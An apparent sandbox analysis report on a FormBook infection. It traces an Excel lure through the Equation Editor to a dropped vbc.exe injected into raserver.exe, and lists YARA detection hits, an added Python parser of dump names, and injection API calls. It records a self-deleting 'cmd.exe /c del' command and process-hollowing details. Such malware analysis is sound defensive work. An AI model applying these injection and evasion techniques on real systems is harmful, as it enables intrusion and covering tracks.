        Source: vbc[1].exe.4.dr, Forms/mainForm.cs | Long String: Length: 38272
        Source: vbc.exe.4.dr, Forms/mainForm.cs | Long String: Length: 38272
        Source: 6.2.vbc.exe.330000.1.unpack, Forms/mainForm.cs | Long String: Length: 38272
        Source: 6.0.vbc.exe.330000.0.unpack, Forms/mainForm.cs | Long String: Length: 38272
        Source: 7.0.vbc.exe.330000.0.unpack, Forms/mainForm.cs | Long String: Length: 38272
        Source: 7.2.vbc.exe.330000.1.unpack, Forms/mainForm.cs | Long String: Length: 38272
        Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY | Matched rules: Formbook_1, Formbook
        Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rules: Formbook_1, Formbook
        Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY | Matched rules: Formbook_1, Formbook
        Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY | Matched rules: Formbook_1, Formbook
        Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY | Matched rules: Formbook_1, Formbook
        Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rules: Formbook_1, Formbook
        Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY | Matched rules: Formbook_1, Formbook
        Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY | Matched rules: Formbook_1, Formbook
        Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY | Matched rules: Formbook_1, Formbook
        Rule Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Rule Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
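        Each memory match above is identified by a dump name such as 00000009.00000002.685585617.00000000002A0000.00000040.00020000.sdmp. The first field and the fourth line up with the report's own notation (the 9_2_ code functions below belong to raserver.exe, 6_2_ and 7_2_ to vbc.exe, and 6.2.vbc.exe.330000.1.unpack uses the same process.dump.base scheme), and the fifth field only ever takes the values 0x40 and 0x04 here, which are the winnt.h constants PAGE_EXECUTE_READWRITE and PAGE_READWRITE. The parser below is added here as an illustration and is not part of the report: it reads those fields so the nine matches can be sorted by page protection, because a FormBook hit inside RWX memory is unpacked or injected code rather than a file-backed image. The field layout beyond the fields named is an assumption about the sandbox's naming; the third and sixth fields are carried through unparsed.

```python
import re
from collections import Counter

# Memory protection constants from winnt.h. Only 0x40 and 0x04 occur in this
# report; the rest are listed so the parser is not specific to it.
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# Assumed layout of a dump name (the sandbox does not document it here):
# <process index>.<dump index>.<id>.<base address>.<protection>.<flags>.sdmp
# Process index and base address follow the report's X.Y.<name>.<base> notation;
# the protection field is read as a winnt.h PAGE_* value; id and flags stay raw.
DUMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<ident>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<flags>[0-9A-Fa-f]{8})\.sdmp$")

# Process names as attributed by the report's code-function lines; 8 is not named there.
PROCESS_NAMES = {6: "vbc.exe", 7: "vbc.exe", 9: "raserver.exe"}

# The nine dump names listed under "Yara detected FormBook".
MATCHES = [
    "00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp",
    "00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp",
    "00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp",
    "00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp",
    "00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp",
    "00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp",
    "00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp",
    "00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp",
    "00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp",
]


def parse_dump_name(name: str) -> dict:
    """Split a dump name into its fields; process/dump indexes are read as hex,
    which agrees with a decimal reading for every value in this report."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"not a dump name: {name}")
    prot = int(m["prot"], 16)
    return {
        "process": int(m["proc"], 16),
        "dump": int(m["dump"], 16),
        "ident": m["ident"],
        "base": int(m["base"], 16),
        "protection": prot,
        "protection_name": PAGE_PROTECTIONS.get(prot & 0xFF, f"0x{prot:X}"),
        "executable": bool(prot & 0xF0),   # PAGE_EXECUTE* family
        "writable": bool(prot & 0xCC),     # READWRITE, WRITECOPY and their EXECUTE_ forms
        "flags": m["flags"],
    }


def summarize(names) -> dict:
    """Count matches per protection and list RWX regions with their owning process."""
    parsed = [parse_dump_name(n) for n in names]
    by_prot = Counter(p["protection_name"] for p in parsed)
    rwx = [(p["process"], PROCESS_NAMES.get(p["process"], "unknown"), f"0x{p['base']:X}")
           for p in parsed if p["executable"] and p["writable"]]
    return {"by_protection": dict(by_prot), "rwx_regions": rwx}


if __name__ == "__main__":
    summary = summarize(MATCHES)
    print(summary["by_protection"])
    for proc, name, base in summary["rwx_regions"]:
        print(f"process {proc} ({name}) RWX region at {base}")
```

        Seven of the nine matches sit in PAGE_EXECUTE_READWRITE memory, including the region at 0x400000 in process 7, the default image base of a 32-bit executable, which is what a hollowed image looks like. The two PAGE_READWRITE hits (process 9 at 0x2A0000, process 6 at 0x34B9000) are data rather than code and are the weaker evidence of the set; they are worth dumping for configuration or decrypted strings, not for disassembly.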
        Source: C:\Users\Public\vbc.exe | Code function: 6_2_001D009C, 6_2_001D1121, 6_2_001D1B00, 6_2_001D3BF8, 6_2_001D4488, 6_2_001D5D50, 6_2_001D4EB1, 6_2_001D1700, 6_2_001D8000,
            6_2_001D30D1, 6_2_001DC210, 6_2_001D8290, 6_2_001D8280, 6_2_001D82CB, 6_2_001D3B68, 6_2_001D13B0, 6_2_001D6BD0, 6_2_001D6BC0,
            6_2_001DAC12, 6_2_001D5C60, 6_2_001D8498, 6_2_001D04EA, 6_2_001D4CE0, 6_2_001D7D98, 6_2_001D7DA8, 6_2_001D9E51, 6_2_001DA749
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00401026, 7_2_00401030, 7_2_0041C2AE, 7_2_00408C50, 7_2_0041BD71, 7_2_00402D88, 7_2_00402D90, 7_2_0041B691, 7_2_0041C754, 7_2_00402FB0,
            7_2_00A4E0C6, 7_2_00A7D005, 7_2_00A53040, 7_2_00A6905A, 7_2_00A4E2E9, 7_2_00AF1238, 7_2_00A4F3CF, 7_2_00A763DB, 7_2_00A52305, 7_2_00A9A37B,
            7_2_00A57353, 7_2_00A85485, 7_2_00A61489, 7_2_00A8D47D, 7_2_00A6C5F0, 7_2_00A5351F, 7_2_00A54680, 7_2_00A5E6C1, 7_2_00AF2622, 7_2_00A5C7BC,
            7_2_00AD579A, 7_2_00A857C3, 7_2_00AEF8EE, 7_2_00A7286D, 7_2_00A5C85C, 7_2_00A529B2, 7_2_00AF098E, 7_2_00A669FE, 7_2_00AD5955, 7_2_00B03A83,
            7_2_00AFCBA4, 7_2_00A4FBD7, 7_2_00ADDBDA, 7_2_00A77B00, 7_2_00AEFDDD, 7_2_00A80D3B, 7_2_00A5CD5B, 7_2_00A82E2F, 7_2_00A6EE4C, 7_2_00A60F3F
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EEE0C6, 9_2_01F0905A, 9_2_01EF3040, 9_2_01F1D005, 9_2_01EEF3CF, 9_2_01F163DB, 9_2_01F3A37B, 9_2_01EF7353, 9_2_01EF2305, 9_2_01EEE2E9,
            9_2_01F91238, 9_2_01F0C5F0, 9_2_01EF351F, 9_2_01F25485, 9_2_01F01489, 9_2_01EFC7BC, 9_2_01F7579A, 9_2_01EFE6C1, 9_2_01EF4680, 9_2_01F92622,
            9_2_01F069FE, 9_2_01EF29B2, 9_2_01F9098E, 9_2_01F75955, 9_2_01F8F8EE, 9_2_01F1286D, 9_2_01EFC85C, 9_2_01F7DBDA, 9_2_01EEFBD7, 9_2_01F9CBA4,
            9_2_01F17B00, 9_2_01FA3A83, 9_2_01F8FDDD, 9_2_01EFCD5B, 9_2_01F20D3B, 9_2_01F1DF7C, 9_2_01F00F3F, 9_2_01F0EE4C,
            9_2_00088C50, 9_2_00082D88, 9_2_00082D90, 9_2_0009C754, 9_2_00082FB0,
            9_2_022667C7, 9_2_022632FF, 9_2_02263302, 9_2_02261362, 9_2_02265062, 9_2_022608F9, 9_2_02260902, 9_2_022675B2
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01EEDF5C appears 101 times
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01F33F92 appears 99 times
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01EEE2A8 appears 38 times
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01F3373B appears 237 times
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01F5F970 appears 77 times
        Source: C:\Users\Public\vbc.exe | Code function: String function: 00A4DF5C appears 104 times
        Source: C:\Users\Public\vbc.exe | Code function: String function: 00A9373B appears 238 times
        Source: C:\Users\Public\vbc.exe | Code function: String function: 00A93F92 appears 108 times
        Source: C:\Users\Public\vbc.exe | Code function: String function: 00ABF970 appears 79 times
        Source: C:\Users\Public\vbc.exe | Code function: String function: 00A4E2A8 appears 37 times
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_004181B0 NtCreateFile
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00418260 NtReadFile
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_004182E0 NtClose
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00418390 NtAllocateVirtualMemory
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_004181B4 NtCreateFile
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041825B NtReadFile
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_004182DA NtClose
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A400C4 NtCreateFile, LdrInitializeThunk
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A40078 NtResumeThread, LdrInitializeThunk
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A40048 NtProtectVirtualMemory, LdrInitializeThunk
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A407AC NtCreateMutant, LdrInitializeThunk
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3F9F0 NtClose, LdrInitializeThunk
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3F900 NtReadFile, LdrInitializeThunk
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FAE8 NtQueryInformationProcess, LdrInitializeThunk
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FAD0 NtAllocateVirtualMemory, LdrInitializeThunk
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FBB8 NtQueryInformationToken, LdrInitializeThunk
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FB68 NtFreeVirtualMemory, LdrInitializeThunk
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FC90 NtUnmapViewOfSection, LdrInitializeThunk
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FC60 NtMapViewOfSection, LdrInitializeThunk
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FD8C NtDelayExecution, LdrInitializeThunk
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FDC0 NtQuerySystemInformation, LdrInitializeThunk
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FEA0 NtReadVirtualMemory, LdrInitializeThunk
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FED0 NtAdjustPrivilegesToken, LdrInitializeThunk
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FFB4 NtCreateSection, LdrInitializeThunk
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A410D0 NtOpenProcessToken
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A40060 NtQuerySection
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A401D4 NtSetValueKey
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A4010C NtOpenDirectoryObject
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A41148 NtOpenThread
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3F8CC NtWaitForSingleObject
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A41930 NtSetContextThread
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3F938 NtWriteFile
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FAB8 NtQueryValueKey
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FA20 NtQueryInformationFile
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FA50 NtEnumerateValueKey
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FBE8 NtQueryVirtualMemory
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FB50 NtCreateKey
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FC30 NtOpenProcess
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A40C40 NtGetContextThread
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FC48 NtSetInformationFile
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A41D80 NtSuspendThread
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FD5C NtEnumerateKey
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FE24 NtWriteVirtualMemory
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FFFC NtCreateProcessEx
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FF34 NtQueueApcThread
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE00C4 NtCreateFile, LdrInitializeThunk
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE07AC NtCreateMutant, LdrInitializeThunk
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDF9F0 NtClose, LdrInitializeThunk
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDF900 NtReadFile, LdrInitializeThunk
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFBB8 NtQueryInformationToken, LdrInitializeThunk
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFB68 NtFreeVirtualMemory, LdrInitializeThunk
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFB50 NtCreateKey, LdrInitializeThunk
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFAE8 NtQueryInformationProcess, LdrInitializeThunk
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFAD0 NtAllocateVirtualMemory, LdrInitializeThunk
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFAB8 NtQueryValueKey, LdrInitializeThunk
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFDC0 NtQuerySystemInformation, LdrInitializeThunk
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFD8C NtDelayExecution, LdrInitializeThunk
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFC60 NtMapViewOfSection, LdrInitializeThunk
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFFB4 NtCreateSection, LdrInitializeThunk
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFED0 NtAdjustPrivilegesToken, LdrInitializeThunk
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE01D4 NtSetValueKey
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE1148 NtOpenThread
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE010C NtOpenDirectoryObject
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE10D0 NtOpenProcessToken
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE0060 NtQuerySection
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE0078 NtResumeThread
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE0048 NtProtectVirtualMemory
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDF938 NtWriteFile
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE1930 NtSetContextThread
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDF8CC NtWaitForSingleObject
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFBE8 NtQueryVirtualMemory
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFA50 NtEnumerateValueKey
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFA20 NtQueryInformationFile
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE1D80 NtSuspendThread
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFD5C NtEnumerateKey
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFC90 NtUnmapViewOfSection
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFC48 NtSetInformationFile
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE0C40 NtGetContextThread
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFC30 NtOpenProcess
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFFFC NtCreateProcessEx
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFF34 NtQueueApcThread
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFEA0 NtReadVirtualMemory
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFE24 NtWriteVirtualMemory
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_000981B0 NtCreateFile
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_00098260 NtReadFile
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_000982E0 NtClose
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_00098390 NtAllocateVirtualMemory
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_000981B4 NtCreateFile
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_0009825B NtReadFile
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_000982DA NtClose
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0226632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,9_2_0226632E
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_022667C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,9_2_022667C7
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_02266332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_02266332
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_022667C2 NtQueryInformationProcess,9_2_022667C2
        Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
        Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
        Source: vbc[1].exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: vbc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: (RFQ) No.109050.xlsxReversingLabs: Detection: 34%
        Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
        Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32Jump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$(RFQ) No.109050.xlsxJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREE15.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/19@5/5
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
        Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
        Source: vbc[1].exe.4.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: vbc.exe.4.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 6.2.vbc.exe.330000.1.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 6.0.vbc.exe.330000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 7.0.vbc.exe.330000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 7.2.vbc.exe.330000.1.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp
        Source: Binary string: wntdll.pdb source: vbc.exe, raserver.exe
        Source: Binary string: RAServer.pdb source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp

        Data Obfuscation:

        .NET source code contains potential unpacker
        Source: vbc[1].exe.4.dr, Forms/mainForm.cs; .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: vbc.exe.4.dr, Forms/mainForm.cs; .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.2.vbc.exe.330000.1.unpack, Forms/mainForm.cs; .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.0.vbc.exe.330000.0.unpack, Forms/mainForm.cs; .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.0.vbc.exe.330000.0.unpack, Forms/mainForm.cs; .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.2.vbc.exe.330000.1.unpack, Forms/mainForm.cs; .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\Public\vbc.exe; Code function: 6_2_001D950F push edi; iretd 6_2_001D9510
        Source: C:\Users\Public\vbc.exe; Code function: 7_2_004070F2 push CB9B4C56h; iretd 7_2_004070F7
        Source: C:\Users\Public\vbc.exe; Code function: 7_2_004158FC pushfd ; retf 7_2_004158FF
        Source: C:\Users\Public\vbc.exe; Code function: 7_2_0041B3F2 push eax; ret 7_2_0041B3F8
        Source: C:\Users\Public\vbc.exe; Code function: 7_2_0041B3FB push eax; ret 7_2_0041B462
        Source: C:\Users\Public\vbc.exe; Code function: 7_2_0041B3A5 push eax; ret 7_2_0041B3F8
        Source: C:\Users\Public\vbc.exe; Code function: 7_2_0041B45C push eax; ret 7_2_0041B462
        Source: C:\Users\Public\vbc.exe; Code function: 7_2_00415436 pushad ; retf 7_2_00415437
        Source: C:\Users\Public\vbc.exe; Code function: 7_2_00415CBF push ds; iretd 7_2_00415CC4
        Source: C:\Users\Public\vbc.exe; Code function: 7_2_00A4DFA1 push ecx; ret 7_2_00A4DFB4
        Source: C:\Windows\SysWOW64\raserver.exe; Code function: 9_2_01EEDFA1 push ecx; ret 9_2_01EEDFB4
        Source: C:\Windows\SysWOW64\raserver.exe; Code function: 9_2_000958FC pushfd ; retf 9_2_000958FF
        Source: C:\Windows\SysWOW64\raserver.exe; Code function: 9_2_000870F2 push CB9B4C56h; iretd 9_2_000870F7
        Source: C:\Windows\SysWOW64\raserver.exe; Code function: 9_2_0009B3A5 push eax; ret 9_2_0009B3F8
        Source: C:\Windows\SysWOW64\raserver.exe; Code function: 9_2_0009B3FB push eax; ret 9_2_0009B462
        Source: C:\Windows\SysWOW64\raserver.exe; Code function: 9_2_0009B3F2 push eax; ret 9_2_0009B3F8
        Source: C:\Windows\SysWOW64\raserver.exe; Code function: 9_2_00095436 pushad ; retf 9_2_00095437
        Source: C:\Windows\SysWOW64\raserver.exe; Code function: 9_2_0009B45C push eax; ret 9_2_0009B462
        Source: C:\Windows\SysWOW64\raserver.exe; Code function: 9_2_00095CBF push ds; iretd 9_2_00095CC4
        Source: vbc[1].exe.4.dr; Static PE information: 0x9EDDC985 [Wed Jun 17 18:52:53 2054 UTC]
        Source: initial sample; Static PE information: section name: .text entropy: 7.15286878392
        Source: initial sample; Static PE information: section name: .text entropy: 7.15286878392
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\Public\vbc.exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\Public\vbc.exe

        Boot Survival:

        Drops PE files to the user root directory
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\Public\vbc.exe
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX (10 occurrences)
